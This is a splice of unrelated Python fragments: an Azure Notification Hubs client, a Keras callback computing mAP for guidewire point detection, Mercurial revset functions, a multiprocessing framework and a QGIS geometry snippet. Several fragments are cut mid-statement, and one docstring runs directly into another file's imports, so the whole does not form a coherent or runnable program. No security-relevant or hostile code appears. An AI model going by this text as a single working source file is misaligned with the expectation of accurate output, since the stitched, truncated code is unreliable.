}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('NotificationHubResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.NotificationHubs/namespaces/{namespaceName}/notificationHubs/{notificationHubName}'}
def create_or_update_authorization_rule(
self, resource_group_name, namespace_name, notification_hub_name, authorization_rule_name, properties, custom_headers=None, raw=False, **operation_config):
"""Creates/Updates an authorization rule for a NotificationHub.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param notification_hub_name: The notification hub name.
:type notification_hub_name: str
:param authorization_rule_name: Authorization Rule Name.
:type authorization_rule_name: str
:param properties: Properties of the Namespace AuthorizationRules.
:type properties:
~azure.mgmt.notificationhubs.models.SharedAccessAuthorizationRuleProperties
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: SharedAccessAuthorizationRuleResource or ClientRawResponse if
raw=true
:rtype:
~azure.mgmt.notificationhubs.models.SharedAccessAuthorizationRuleResource
or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
parameters = models.SharedAccessAuthorizationRuleCreateOrUpdateParameters(properties=properties)
# Construct URL
url = self.create_or_update_authorization_rule.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str'),
'notificationHubName': self._serialize.url("notification_hub_name", notification_hub_name, 'str'),
'authorizationRuleName': self._serialize.url("authorization_rule_name", authorization_rule_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'SharedAccessAuthorizationRuleCreateOrUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SharedAccessAuthorizationRuleResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_or_update_authorization_rule.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.NotificationHubs/namespaces/{namespaceName}/notificationHubs/{notificationHubName}/AuthorizationRules/{authorizationRuleName}'}
def delete_authorization_rule(
self, resource_group_name, namespace_name, notification_hub_name, authorization_rule_name, custom_headers=None, raw=False, **operation_config):
"""Deletes a notificationHub authorization rule.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param notification_hub_name: The notification hub name.
:type notification_hub_name: str
:param authorization_rule_name: Authorization Rule Name.
:type authorization_rule_name: str
:param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside
import keras.backend as K
import cv2, time, os
import numpy as np
import model as modellib
from skimage import morphology
class MAPCallback:
def __init__(self,
model,
val_dataset,
class_names,
threshold=5,
inference_num=50,
batch_size=1,
old_version=False):
super(MAPCallback, self).__init__()
self.model = model
self.inference_num = inference_num
self.class_names = class_names
self.num_classes = len(class_names)
self.val_dataset = val_dataset
self.threshold = threshold
self.batch_size = batch_size
self.old_version = old_version
def _voc_ap(self, rec, prec):
# correct AP calculation
# first append sentinel values at the end
mrec = np.concatenate(([0.], rec, [1.]))
mpre = np.concatenate(([0.], prec, [0.]))
# compute the precision envelope
for i in range(mpre.size - 1, 0, -1):
mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
# to calculate area under PR curve, look for points
# where X axis (recall) changes value
i = np.where(mrec[1:] != mrec[:-1])[0]
# and sum (\Delta recall) * prec
ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
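        # Tiny worked example of the sum above: rec = [0.5, 1.0] and
        # prec = [1.0, 0.5] give mrec = [0, 0.5, 1, 1] and an enveloped
        # mpre = [1, 1, 0.5, 0], so ap = 0.5 * 1.0 + 0.5 * 0.5 = 0.75.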
return ap
def calculate_result(self):
true_res = {}
pred_res = []
inference_time = 0
for i in range(self.inference_num):
image, class_ids, bbox, point = modellib.load_image_gt_eval(self.val_dataset, i)
start = time.time()
results = self.model.detect([image])[0]
end = time.time()
inference_time = inference_time + (end - start)
out_boxes = results['rois']
out_scores = results['scores']
out_masks = results['masks']
pred_res_0 = []
pred_res_1 = []
if len(out_boxes) > 0:
for out_box, out_score, out_mask in zip(
out_boxes, out_scores, out_masks):
det_point = np.unravel_index(out_mask[:, :, 0].argmax(), out_mask[:, :, 0].shape)
if self.old_version:
pred_res_0.append([i, 0, out_score, det_point[1] + 1, det_point[0] + 1])
else:
pred_res_0.append([i, 0, out_score * out_mask[:, :, 0].max(), det_point[1] + 1, det_point[0] + 1])
# print([i, 0, out_mask[:, :, 0].max(), det_point[1] + 1, det_point[0] + 1])
det_point = np.unravel_index(out_mask[:, :, 1].argmax(), out_mask[:, :, 1].shape)
if self.old_version:
pred_res_1.append([i, 1, out_score, det_point[1] + 1, det_point[0] + 1])
else:
pred_res_1.append([i, 1, out_score * out_mask[:, :, 1].max(), det_point[1] + 1, det_point[0] + 1])
# print([i, 1, out_score * out_mask[:, :, 1].max(), det_point[1] + 1, det_point[0] + 1])
pred_res_0 = nms_point(pred_res_0, 10)
pred_res_1 = nms_point(pred_res_1, 10)
pred_res.extend(pred_res_0)
pred_res.extend(pred_res_1)
true_res[i] = point # [num_guidewire, num_point, 2]
# print(point)
print('avg_infer_time:' + str(inference_time / self.inference_num))
return true_res, pred_res
def compute_aps(self, true_res, pred_res, threshold):
APs = {}
for cls in range(self.num_classes):
pred_res_cls = [x for x in pred_res if x[1] == cls]
if len(pred_res_cls) == 0:
APs[cls] = 0
continue
true_res_cls = {}
npos = 0
for index in true_res: # index is the image_id
guidewires = true_res[index] # [num_guidewire, num_point, 2]
npos += len(guidewires) # compute recall
point_pos = np.array([x[cls] for x in guidewires]) # [num_guidewire, 2]
true_res_cls[index] = {
'point_pos': point_pos,
}
ids = [x[0] for x in pred_res_cls]
scores = np.array([x[2] for x in pred_res_cls])
points = np.array([x[3:] for x in pred_res_cls])
sorted_ind = np.argsort(-scores)
points = points[sorted_ind, :] # sorted
ids = [ids[x] for x in sorted_ind] # sorted
nd = len(ids)
tp = np.zeros(nd)
fp = np.zeros(nd)
for j in range(nd):
ture_point = true_res_cls[ids[j]]
point1 = points[j, :] # [2]
dis_min = np.inf
PGT = ture_point['point_pos'] # [num_guidewire, 2]
if len(PGT) > 0:
dis_square = np.square(PGT[:, 0] - point1[0]) + np.square(PGT[:, 1] - point1[1])
dis_min = np.min(dis_square)
if dis_min < threshold * threshold:
tp[j] = 1.
else:
fp[j] = 1.
fp = np.cumsum(fp)
tp = np.cumsum(tp)
rec = tp / np.maximum(float(npos), np.finfo(np.float64).eps)
prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
ap = self._voc_ap(rec, prec)
APs[cls] = ap
return APs
def on_epoch_end(self, logs=None):
logs = logs or {}
K.set_learning_phase(0)
true_res, pred_res = self.calculate_result()
for th in [3, 5, 7, 9]:
APs = self.compute_aps(true_res, pred_res, th)
for cls in range(self.num_classes):
if cls in APs:
print(self.class_names[cls] + ' ap: ', APs[cls])
mAP = np.mean([APs[cls] for cls in APs])
print('mAP: ', mAP)
logs['mAP'] = mAP
def nms_point(point_list, thresh):
'''point_list: [i, point_id, score, x, y]'''
keep = []
while point_list:
keep.append(point_list[0])
now = point_list[0]
del point_list[0]
del_inds = []
for i in range(len(point_list)):
dis_square = np.square(point_list[i][3] - now[3]) + np.square(point_list[i][4] - now[4])
if dis_square < thresh * thresh:
del_inds.append(i)
if del_inds:
del_inds.reverse()
for i in del_inds:
del point_list[i]
return keep
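# Example behaviour of nms_point with thresh=10: the list
# [[0, 0, 0.9, 10, 10], [0, 0, 0.8, 12, 11], [0, 0, 0.7, 50, 50]]
# reduces to its first and third entries, because the second point lies
# within 10 pixels of the first and is therefore suppressed.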
class MAPCallbackSame(MAPCallback):
def __init__(self,
model,
val_dataset,
class_names,
threshold=5,
inference_num=50,
batch_size=1):
        super(MAPCallbackSame, self).__init__(model, val_dataset, class_names, threshold, inference_num, batch_size)
self.model = model
self.inference_num = inference_num
self.class_names = class_names
self.num_classes = len(class_names)
self.val_dataset = val_dataset
self.threshold = threshold
self.batch_size = batch_size
def compute_point(self, pred, thresh, sigma):
point = -1 * np.ones((2, 2), np.int32)
idx = np.unravel_index(pred.argmax(), pred.shape)
# print(pred.shape)
if pred[idx[0], idx[1]] > thresh:
point[0] = [idx[0], idx[1]]
minus = makeGaussian(pred.shape[0], pred.shape[1], sigma, (idx[1], idx[0])) * pred[idx[0], idx[1]]
pred = pred - minus
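            # Subtracting a Gaussian bump centred on the first maximum suppresses
            # that peak, so the next argmax can locate the second endpoint.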
idx_1 = np.unravel_index(pred.argmax(), pred.shape)
if pred[idx_1[0], idx_1[1]] > thresh:
point[1] = [idx_1[0], idx_1[1]]
return point
def calculate_result(self):
true_res = {}
pred_res = []
inference_time = 0
for i in range(self.inference_num):
image, class_ids, bbox, point = modellib.load_image_gt_eval(self.val_dataset, i)
start = time.time()
results = self.model.detect([image])[0]
end = time.time()
inference_time = inference_time + (end - start)
out_boxes = results['rois']
out_scores = results['scores']
out_masks = results['masks']
if len(out_boxes) > 0:
for out_box, out_score, out_mask in zip(
out_boxes, out_scores, out_masks):
det_point = self.compute_point(out_mask[:, :, 0], 0.1, 6)
pred_res.append([i, 0, out_score, det_point[0][1] + 1, det_point[0][0] + 1])
pred_res.append([i, 0, out_score, det_point[1][1] + 1, det_point[1][0] + 1])
# print([i, 0, out_score, det_point[0][1], det_point[0][0]])
# print([i, 0, out_score, det_point[1][1], det_point[1][0]])
true_res[i] = point # [num_guidewire, num_point, 2]
print('avg_infer_time:' + str(inference_time / self.inference_num))
return true_res, pred_res
def compute_aps(self, true_res, pred_res, threshold):
APs = {}
for cls in range(self.num_classes):
pred_res_cls = [x for x in pred_res if x[1] == cls]
if len(pred_res_cls) == 0:
APs[cls] = 0
continue
true_res_cls = {}
npos = 0
for index in true_res: # index is the image_id
guidewires = true_res[index] # [num_guidewire, num_point, 2]
guidewires = np.reshape(guidewires, [guidewires.shape[0] * guidewires.shape[1], 1, 2])
npos += len(guidewires) # compute recall
point_pos = np.array([x[cls] for x in guidewires]) # [num_guidewire, 2]
true_res_cls[index] = {
'point_pos': point_pos,
}
ids = [x[0] for x in pred_res_cls]
scores = np.array([x[2] for x in pred_res_cls])
points = np.array([x[3:] for x in pred_res_cls])
sorted_ind = np.argsort(-scores)
points = points[sorted_ind, :] # sorted
ids = [ids[x] for x in sorted_ind] # sorted
nd = len(ids)
tp = np.zeros(nd)
fp = np.zeros(nd)
for j in range(nd):
ture_point = true_res_cls[ids[j]]
point1 = points[j, :] # [2]
dis_min = np.inf
PGT = ture_point['point_pos'] # [num_guidewire, 2]
if len(PGT) > 0:
dis_square = np.square(PGT[:, 0] - point1[0]) + np.square(PGT[:, 1] - point1[1])
dis_min = np.min(dis_square)
if dis_min < threshold * threshold:
tp[j] = 1.
else:
fp[j] = 1.
fp = np.cumsum(fp)
tp = np.cumsum(tp)
rec = tp / np.maximum(float(npos), np.finfo(np.float64).eps)
prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
ap = self._voc_ap(rec, prec)
APs[cls] = ap
return APs
def makeGaussian(height, width, sigma=3, center=None):
""" make一个高斯核,是生成heatmap的一个部分
"""
x = np.arange(0, width, 1, float)
y = np.arange(0, height, 1, float)[:, np.newaxis]
if center is None:
x0 = width // 2
y0 = height // 2
else:
x0 = center[0]
y0 = center[1]
return np.exp(-4 * np.log(2) * ((x - x0) ** 2 + (y - y0) ** 2) / (sigma ** 2))
class MAPCallbackMask(MAPCallbackSame):
def __init__(self,
model,
val_dataset,
class_names,
threshold=0.1,
inference_num=50,
batch_size=1):
# super(MAPCallbackMask, self).__init__()
self.model = model
self.inference_num = inference_num
self.class_names = class_names
self.num_classes = len(class_names)
self.val_dataset = val_dataset
self.threshold = threshold
self.batch_size = batch_size
def compute_point_from_mask(self, pred, thresh):
pred = (pred > thresh).astype('uint8')
skeleton = morphology.skeletonize(pred)
fil = np.array([[1, 1, 1], [1, 8, 1], [1, 1, 1]])
conv = cv2.filter2D(np.float32(skeleton), -1, fil)
result = conv == 9
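        # A skeleton endpoint has exactly one 8-connected neighbour, so with the
        # centre weighted 8 and neighbours weighted 1 the filter response equals
        # 9 only at endpoints.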
x, y = np.where(result == True)
endpoint = []
num_point = min(len(x), 2)
for i in range(num_point):
endpoint.append(np.array([x[i], y[i]]))
return endpoint
def calculate_result(self):
true_res = {}
pred_res = []
inference_time = 0
for i in range(self.inference_num):
image, class_ids, bbox, point = modellib.load_image_gt_eval(self.val_dataset, i)
start = time.time()
results = self.model.detect([image])[0]
end = time.time()
inference_time = inference_time + (end - start)
out_boxes = results['rois']
out_scores = results['scores']
out_masks = results['masks']
if len(out_boxes) > 0:
for out_box, out_score, out_mask in zip(
out_boxes, out_scores, out_masks):
det_point = self.compute_point_from_mask(out_mask[:, :, 0], self.threshold)
for det_point_i in det_point:
pred_res.append([i, 0, out_score, det_point_i[1] + 1, det_point_i[0] + 1])
# print([i, 0, | |
source.startswith(rev))
return subset.filter(lambda r: _matchvalue(r))
def date(repo, subset, x):
"""``date(interval)``
Changesets within the interval, see :hg:`help dates`.
"""
# i18n: "date" is a keyword
ds = getstring(x, _("date requires a string"))
dm = util.matchdate(ds)
return subset.filter(lambda x: dm(repo[x].date()[0]))
def desc(repo, subset, x):
"""``desc(string)``
Search commit message for string. The match is case-insensitive.
"""
# i18n: "desc" is a keyword
ds = encoding.lower(getstring(x, _("desc requires a string")))
def matches(x):
c = repo[x]
return ds in encoding.lower(c.description())
return subset.filter(matches)
def _descendants(repo, subset, x, followfirst=False):
roots = getset(repo, fullreposet(repo), x)
if not roots:
return baseset()
s = _revdescendants(repo, roots, followfirst)
# Both sets need to be ascending in order to lazily return the union
# in the correct order.
base = subset & roots
desc = subset & s
result = base + desc
if subset.isascending():
result.sort()
elif subset.isdescending():
result.sort(reverse=True)
else:
result = subset & result
return result
def descendants(repo, subset, x):
"""``descendants(set)``
Changesets which are descendants of changesets in set.
"""
return _descendants(repo, subset, x)
def _firstdescendants(repo, subset, x):
# ``_firstdescendants(set)``
# Like ``descendants(set)`` but follows only the first parents.
return _descendants(repo, subset, x, followfirst=True)
def destination(repo, subset, x):
"""``destination([set])``
Changesets that were created by a graft, transplant or rebase operation,
with the given revisions specified as the source. Omitting the optional set
is the same as passing all().
"""
if x is not None:
sources = getset(repo, fullreposet(repo), x)
else:
sources = fullreposet(repo)
dests = set()
# subset contains all of the possible destinations that can be returned, so
# iterate over them and see if their source(s) were provided in the arg set.
# Even if the immediate src of r is not in the arg set, src's source (or
# further back) may be. Scanning back further than the immediate src allows
# transitive transplants and rebases to yield the same results as transitive
# grafts.
for r in subset:
src = _getrevsource(repo, r)
lineage = None
while src is not None:
if lineage is None:
lineage = list()
lineage.append(r)
# The visited lineage is a match if the current source is in the arg
# set. Since every candidate dest is visited by way of iterating
# subset, any dests further back in the lineage will be tested by a
# different iteration over subset. Likewise, if the src was already
# selected, the current lineage can be selected without going back
# further.
if src in sources or src in dests:
dests.update(lineage)
break
r = src
src = _getrevsource(repo, r)
return subset.filter(dests.__contains__)
def divergent(repo, subset, x):
"""``divergent()``
Final successors of changesets with an alternative set of final successors.
"""
# i18n: "divergent" is a keyword
getargs(x, 0, 0, _("divergent takes no arguments"))
divergent = obsmod.getrevs(repo, 'divergent')
return subset & divergent
def draft(repo, subset, x):
"""``draft()``
Changeset in draft phase."""
# i18n: "draft" is a keyword
getargs(x, 0, 0, _("draft takes no arguments"))
phase = repo._phasecache.phase
target = phases.draft
condition = lambda r: phase(repo, r) == target
return subset.filter(condition, cache=False)
def extinct(repo, subset, x):
"""``extinct()``
Obsolete changesets with obsolete descendants only.
"""
# i18n: "extinct" is a keyword
getargs(x, 0, 0, _("extinct takes no arguments"))
extincts = obsmod.getrevs(repo, 'extinct')
return subset & extincts
def extra(repo, subset, x):
"""``extra(label, [value])``
Changesets with the given label in the extra metadata, with the given
optional value.
If `value` starts with `re:`, the remainder of the value is treated as
a regular expression. To match a value that actually starts with `re:`,
use the prefix `literal:`.
"""
# i18n: "extra" is a keyword
l = getargs(x, 1, 2, _('extra takes at least 1 and at most 2 arguments'))
# i18n: "extra" is a keyword
label = getstring(l[0], _('first argument to extra must be a string'))
value = None
if len(l) > 1:
# i18n: "extra" is a keyword
value = getstring(l[1], _('second argument to extra must be a string'))
kind, value, matcher = _stringmatcher(value)
def _matchvalue(r):
extra = repo[r].extra()
return label in extra and (value is None or matcher(extra[label]))
return subset.filter(lambda r: _matchvalue(r))
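# Illustrative revset queries for the predicate above (the extra-field names are
# only examples):
#   hg log -r "extra('branch')"
#   hg log -r "extra('source', 're:^http')"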
def filelog(repo, subset, x):
"""``filelog(pattern)``
Changesets connected to the specified filelog.
For performance reasons, visits only revisions mentioned in the file-level
filelog, rather than filtering through all changesets (much faster, but
doesn't include deletes or duplicate changes). For a slower, more accurate
result, use ``file()``.
The pattern without explicit kind like ``glob:`` is expected to be
relative to the current directory and match against a file exactly
for efficiency.
If some linkrev points to revisions filtered by the current repoview, we'll
work around it to return a non-filtered value.
"""
# i18n: "filelog" is a keyword
pat = getstring(x, _("filelog requires a pattern"))
s = set()
cl = repo.changelog
if not matchmod.patkind(pat):
f = pathutil.canonpath(repo.root, repo.getcwd(), pat)
files = [f]
else:
m = matchmod.match(repo.root, repo.getcwd(), [pat], ctx=repo[None])
files = (f for f in repo[None] if m(f))
for f in files:
backrevref = {} # final value for: filerev -> changerev
lowestchild = {} # lowest known filerev child of a filerev
delayed = [] # filerev with filtered linkrev, for post-processing
lowesthead = None # cache for manifest content of all head revisions
fl = repo.file(f)
for fr in list(fl):
rev = fl.linkrev(fr)
if rev not in cl:
# changerev pointed in linkrev is filtered
# record it for post processing.
delayed.append((fr, rev))
continue
for p in fl.parentrevs(fr):
if 0 <= p and p not in lowestchild:
lowestchild[p] = fr
backrevref[fr] = rev
s.add(rev)
# Post-processing of all filerevs we skipped because they were
# filtered. If such filerevs have known and unfiltered children, this
# means they have an unfiltered appearance out there. We'll use linkrev
# adjustment to find one of these appearances. The lowest known child
# will be used as a starting point because it is the best upper-bound we
# have.
#
# This approach will fail when an unfiltered but linkrev-shadowed
# appearance exists in a head changeset without unfiltered filerev
# children anywhere.
while delayed:
# must be a descending iteration. To slowly fill lowest child
# information that is of potential use by the next item.
fr, rev = delayed.pop()
lkr = rev
child = lowestchild.get(fr)
if child is None:
# search for existence of this file revision in a head revision.
# There are three possibilities:
# - the revision exists in a head and we can find an
# introduction from there,
# - the revision does not exist in a head because it has been
# changed since its introduction: we would have found a child
# and be in the other 'else' clause,
# - all versions of the revision are hidden.
if lowesthead is None:
lowesthead = {}
for h in repo.heads():
fnode = repo[h].manifest().get(f)
if fnode is not None:
lowesthead[fl.rev(fnode)] = h
headrev = lowesthead.get(fr)
if headrev is None:
# content is nowhere unfiltered
continue
rev = repo[headrev][f].introrev()
else:
# the lowest known child is a good upper bound
childcrev = backrevref[child]
# XXX this does not guarantee returning the lowest
# introduction of this revision, but this gives a
# result which is a good start and will fit in most
# cases. We probably need to fix the multiple
# introductions case properly (report each
# introduction, even for identical file revisions)
# once and for all at some point anyway.
for p in repo[childcrev][f].parents():
if p.filerev() == fr:
rev = p.rev()
break
if rev == lkr: # no shadowed entry found
# XXX This should never happen unless some manifest points
# to biggish file revisions (like a revision that uses a
# parent that never appears in the manifest ancestors)
continue
# Fill the data for the next iteration.
for p in fl.parentrevs(fr):
if 0 <= p and p not in lowestchild:
lowestchild[p] = fr
backrevref[fr] = rev
s.add(rev)
return subset & | |
import sys
import os
import time
import queue
import random
import logging
import concurrent.futures as cf
from multiprocessing import Process
from multiprocessing import Queue
# PROGRAM CONFIG
STOPONFE = True;
DEBUG = False;
LOG = True;
# logger_format = "[%(asctime)s %(msecs)03dms] [PID %(process)d] %(message)s";
# error_logger_format = "[ERROR] [%(asctime)s] [PID %(process)d %(threadName)s] %(message)s";
info_logger_format = "[%(asctime)s %(msecs)03dms] [PID %(process)d %(threadName)s] %(message)s";
# logging.basicConfig(format=error_logger_format, level=logging.ERROR, datefmt="%I:%M:%S");
logging.basicConfig(format=info_logger_format, level=logging.INFO, datefmt="%I:%M:%S");
def info(message):
if (LOG is None and DEBUG) or LOG: logging.info(message);
return message;
class StopProcessing(Exception):
pass;
class Error(object):
## It's used to represent an error obtained, when an
## exception is raised.
def __init__(self, code=None, message: str=None, args: tuple=(None,)):
""" Constructor of an error"""
super(Error, self).__init__();
        assert code is not None or message is not None or args != (None,), (
            "This instance of Error is not valid."
        );
self.__message = message;
self.__code = code;
self.__args = args;
@property
def message(self):
return self.__message;
@property
def code(self):
return self.__code;
@property
def args(self):
return self.__args;
def show(self):
if (LOG is None and DEBUG) or LOG: print(self);
return self;
def __str__(self):
msg = "[ERROR] ";
if self.__code is not None:
msg += "[CDOE {}] ".format(self.__code);
if self.__message is not None:
msg += "{}".format(self.__message);
else:
msg += "{}".format(self.__args);
return msg;
class Logger(object):
## 1. It's used to represent the errors log
    ## 2. It's an iterable object instance.
## 3. It has a len which equals to the errors count
def __init__(self,):
"""Contructor of a logger instance"""
super(Logger, self).__init__();
self.__errors = []; # this is the errors list
@property
def errors(self):
return self.__errors;
def err(self, e: Error):
"""Function which add an error in error instance list"""
self.__errors.append(e);
def has_errors(self):
"""Function to check if there is an error"""
return len(self.__errors) > 0;
def __iter__(self):
"""Define that the object is iterable."""
return iter(self.__errors);
def __len__(self):
"""Return the len of errors list."""
return len(self.__errors);
def __str__(self):
out = "";
for e in self.__errors:
out += "{}\n".format(e);
return out;
class CProcess(Process):
## It's used to represent a process with error managment.
def __init__(self, *args, **kwargs):
"""Constructor of a customized process"""
super(CProcess, self).__init__(*args, **kwargs);
self._log = Logger();
@property
def logger(self):
return self._log;
class State(object):
# Structure of global state for multi-processing
pass;
class BaseProc(object):
## This class is the basic structure of a Processing sequence and
## the elementary processing.
def __init__(self, name=None, stsdef=[0, 1]):
"""Constructor of a basic processing instance"""
super(BaseProc, self).__init__();
self.__status_index = 0; # represents the index of next status to select
self._local_data = None; # Local data
self._stsdef = stsdef # contains a definition of all available status
self._status = None; # Status of the processing
self._state = None; # State will be used in the processing (global data)
self._name = name if name is not None\
else str(random.randint(0, round(time.time())));
        # List of errors detected in the course of the processing
self._log = Logger();
# callback methods used when processing start
# and when processing terminate
self._on_start_cb = None;
self._on_done_cb = None;
@property
def local(self):
return self._local_data;
@local.setter
def local(self, value):
self._local_data = value;
return value;
@property
def name(self):
return self._name;
@name.setter
def name(self, name):
self._name = name;
@property
def state(self):
return self._state;
@state.setter
def state(self, value):
self._state = value;
return value;
@property
def status(self):
return self._status;
@status.setter
def status(self, value):
if value in self._stsdef:
self.__status_index = self._stsdef.index(value) + 1;
self._status = value;
return self._status;
else:
e = Error(message="[ERROR] This status is not defined for this processing!").show();
self._log.err(e);
return False;
@property
def logger(self):
return self._log;
@property
def on_start_cb(self):
return self._on_start_cb;
@property
def on_done_cb(self):
return self._on_done_cb;
def mut(self):
"""Function that is used to change the processing status"""
if self.__status_index is not None and self.__status_index < len(self._stsdef):
self._status = self._stsdef[self.__status_index];
self.__status_index += 1;
else:
self._status = None;
self.__status_index = 0;
return self._status;
def set_on_start_cb(self, callback):
"""Function which defines the callback function which will be used
when the processing will start."""
assert callable(callback), (
"The callback must be a function which accepts 1 argument"
);
self._on_start_cb = callback;
return callback;
def set_on_done_cb(self, callback):
"""Function which defines the callback function which will be used
when the processing will terminate."""
assert callable(callback), (
"The callback must be a function which accepts 1 argument"
);
self._on_done_cb = callback;
return callback;
def _exec_f(self, state: object, data: object=None):
"""Function which will be called, when we execute this processing.
So this object which represent a processing is callable."""
# we can call the function of processing with the current state received
# by argument, provided the processing function is defined in this instance.
assert hasattr(self, 'proc_f'), (
"The proc_f function is not defined in this processing !"
);
assert callable(self.proc_f), (
"The proc_f must is a callable function."
);
# execute the processing function
result = None;
result = self.proc_f(state, data);
# we return the current state
return result;
def exec(self, state, args):
"""This function allows to recovery arguments from process queue and
to pass there to processing function for an execution of processing."""
# info("Execution of this processing started ...");
result = self._exec_f(state, args);
# info("Termited.");
return state, result;
def init_f(self, state: object):
"""Function to implement by programmer. This function is called before
execution of main processing."""
raise NotImplementedError;
class Proc(BaseProc):
    ## This class represents an elementary processing [O(1)]
def __init__(self, name=None, stsdef=[0]):
"""Constructor of an elementary processing instance."""
super(Proc, self).__init__(name, stsdef);
def proc_f(self, state: object, data: object=None):
"""Function which should be redefined by the programmer.
It's the function which implements the processing to course."""
raise NotImplementedError;
def __iter__(self):
"""Iterator of instruction of this processing"""
return iter([(self.exec, self._local_data,)]);
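# Minimal usage sketch (not part of the framework): a Proc subclass only needs to
# implement proc_f(); exec() then threads the shared state and the local payload
# through it. The names below are illustrative.
class SquareProc(Proc):
    def proc_f(self, state: object, data: object=None):
        # square the local payload and hand the result back to the caller
        return None if data is None else data * data;
# example call:
#   p = SquareProc(name="square");
#   p.local = 4;
#   state, result = p.exec(State(), p.local);  # result == 16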
class MulProc(Proc):
    ## This class represents a multi-processing implementation [O(n)].
## This processing must be executed by a multi-thread loop using thread pool.
def __init__(self, name=None, stsdef=[0, 1]):
"""Constructor of a multi-processing instance."""
super(MulProc, self).__init__(name, stsdef);
# {_d_set} represent the var name which contains the iterable data.
# It must not be equal to None, because it's required.
self._d_set = [];
self._n_div = 0; # represents the number of division.
@property
def dset(self):
return self._d_set;
@dset.setter
def dset(self, dset):
"""Function that is used to define the dataset."""
self._d_set = dset;
return dset;
@property
def ndiv(self):
return self._n_div;
@ndiv.setter
def ndiv(self, ndv):
"""Function that is used to define the number of division"""
assert type(ndv) is int, ("The number of division must be an integer type.");
self._n_div = ndv;
return ndv;
def d_proc_f(self, state, dset, dx):
"""Function that is to implement for the thread processing of multi-processing process"""
raise NotImplementedError;
def dexc(self, state, args):
"""This function allows to recovery arguments from process queue and
to pass there to processing function for an execution of processing."""
dset = args.get('dset');
dx = args.get('dx');
# info(f"Exec d_proc {dx = } is started ...");
result = self._d_exc_f(state, dset, dx);
# info(f"d_proc {dx = } done !");
return state, result;
def _d_exc_f(self, state: object, dset: object, dx: list=[]):
"""Function which will be called, when we execute this processing.
So this object which represent a processing is callable."""
# we can call the function of processing with the current state received
# by argument, provided the processing function is defined in this instance.
assert hasattr(self, 'd_proc_f'), (
"The proc_f function is not defined in this processing !"
);
assert callable(self.d_proc_f), (
"The proc_f must is a callable function."
);
# the following var will contain the returned result
result = None;
# execute the processing function
dt = type(dset);
kx = [];
if dt is dict:
            keys = list(dset.keys());
for k in dx:
kx.append(keys[k]);
elif dt is list or hasattr(dset, '__iter__'):
kx = dx;
if len(kx) > 0: info("ELEM PROC [%16d .. %16d] ..." % (kx[0], kx[-1]));
else:
info("NO PROC FOR [%16d .. %16d]" % (0, 0));
result = self.d_proc_f(state, dset, kx);
# err = Error(message=e.args[0], args=(e,));
# print("[ERROR] {}".format(err.message));
# self.__log.err(e);
# we return the current state
if len(kx) > 0: info("ELEM PROC [%16d .. %16d] ... DONE !" % (kx[0], kx[-1]));
return result;
def __iter__(self):
"""Function which returns a (dexc(), | |
(geometry.wkbType() == QGis.WKBMultiLineString) or \
(geometry.wkbType() == QGis.WKBMultiLineString25D):
lines = geometry.asMultiPolyline()
line = lines[0]
fromx = line[0].x()
fromy = line[0].y()
line = lines[len(lines) - 1]
tox = line[len(line) - 1].x()
toy = line[len(line) - 1].y()
else:
# errant geometry type?!
continue
# return "Street layer must be a lines or multilines (WKB Type " + \
# unicode(geometry.wkbType()) + ")"
# Use attribute values if specified
try:
if tox_attribute:
# (tox, test) = attributes[tox_attribute].toDouble()
tox = float(attributes[tox_attribute])
if toy_attribute:
# (toy, test) = attributes[toy_attribute].toDouble()
toy = float(attributes[toy_attribute])
if fromx_attribute:
# (fromx, test) = attributes[fromx_attribute].toDouble()
fromx = float(attributes[fromx_attribute])
if fromy_attribute:
# (fromy, test) = attributes[fromy_attribute].toDouble()
fromy = float(attributes[fromy_attribute])
except:
tox = 0
toy = 0
fromx = 0
fromy = 0
